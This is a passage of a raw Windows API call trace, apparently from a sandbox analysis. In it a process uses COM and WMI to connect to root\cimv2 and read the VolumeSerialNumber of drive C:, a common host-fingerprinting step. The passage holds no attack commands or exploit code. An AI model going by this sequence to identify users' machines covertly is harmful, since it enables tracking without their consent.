[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0197.970] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x2 [0197.970] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x1 [0197.970] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0197.970] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0197.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6029d50) returned 0x0 [0197.970] WbemDefPath:IUnknown:AddRef (This=0x6029d50) returned 0x3 [0197.970] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x2 [0197.970] WbemDefPath:IWbemPath:SetText (This=0x6029d50, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029d50, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029d50, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029d50, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0197.970] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0197.971] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0197.971] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0197.971] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.971] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0197.971] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0197.971] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0197.971] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.971] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x60278d0) returned 0x0 [0197.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0197.972] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6029dc0) returned 0x0 [0197.972] WbemDefPath:IUnknown:Release (This=0x60278d0) returned 0x0 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6029dc0) returned 0x0 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0197.972] WbemDefPath:IUnknown:AddRef (This=0x6029dc0) returned 0x3 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66cca78) returned 0x0 [0197.972] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.972] WbemDefPath:IUnknown:Release (This=0x66cca78) returned 0x3 [0197.972] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0197.972] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0197.972] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x2 [0197.972] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x1 [0197.972] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0197.972] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0197.972] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029dc0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6029dc0) returned 0x0 [0197.972] WbemDefPath:IUnknown:AddRef (This=0x6029dc0) returned 0x3 [0197.972] WbemDefPath:IUnknown:Release (This=0x6029dc0) returned 0x2 [0197.972] WbemDefPath:IWbemPath:SetText (This=0x6029dc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0197.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0197.972] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0197.972] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.972] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0197.973] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0197.973] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0197.973] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.973] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6024a28) returned 0x0 [0197.973] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0197.973] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024a28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60271d0) returned 0x0 [0197.973] WbemLocator:IUnknown:Release (This=0x6024a28) returned 0x0 [0197.973] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60271d0) returned 0x0 [0197.973] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0197.974] WbemLocator:IUnknown:AddRef (This=0x60271d0) returned 0x3 [0197.974] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0197.974] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0197.974] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0197.974] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0197.974] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0197.974] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0197.974] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x2 [0197.974] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x1 [0197.974] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0197.974] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0197.974] WbemLocator:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60271d0) returned 0x0 [0197.974] WbemLocator:IUnknown:AddRef (This=0x60271d0) returned 0x3 [0197.974] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x2 [0197.974] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0197.974] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0197.974] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.974] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x60271e0) returned 0x0 [0197.974] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x6033634) returned 0x0 [0198.683] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b134) returned 0x0 [0198.683] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x6033634, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0198.683] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0198.683] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b154) returned 0x0 [0198.683] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b134) returned 0x0 [0198.684] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x6033634, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.684] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0198.684] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0198.684] CoTaskMemFree (pv=0xbd4858) [0198.684] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x0 [0198.684] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b154) returned 0x0 [0198.684] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0198.684] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0198.685] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0198.685] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0198.685] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0198.685] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b0b4) returned 0x0 [0198.685] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.686] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0198.686] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0198.686] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0198.686] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b13c) returned 0x0 [0198.686] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0198.686] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0198.686] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0198.686] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0198.686] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0198.686] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x6033634) returned 0x0 [0198.686] WbemLocator:IUnknown:AddRef (This=0x6033634) returned 0x4 [0198.686] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x3 [0198.686] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x2 [0198.686] SysStringLen (param_1=0x0) returned 0x0 [0198.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0198.686] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0198.686] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.686] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0198.686] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0198.686] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b154) returned 0x0 [0198.686] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0198.686] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0198.686] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0198.686] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.687] IWbemServices:GetObject (in: This=0x6033634, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0198.789] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029dc0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0198.789] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0198.789] WbemDefPath:IWbemPath:GetText (in: This=0x6029dc0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.789] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c30c4*=0, plFlavor=0x36c30c8*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c30c4*=8, plFlavor=0x36c30c8*=0) returned 0x0 [0198.789] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.789] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.789] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), 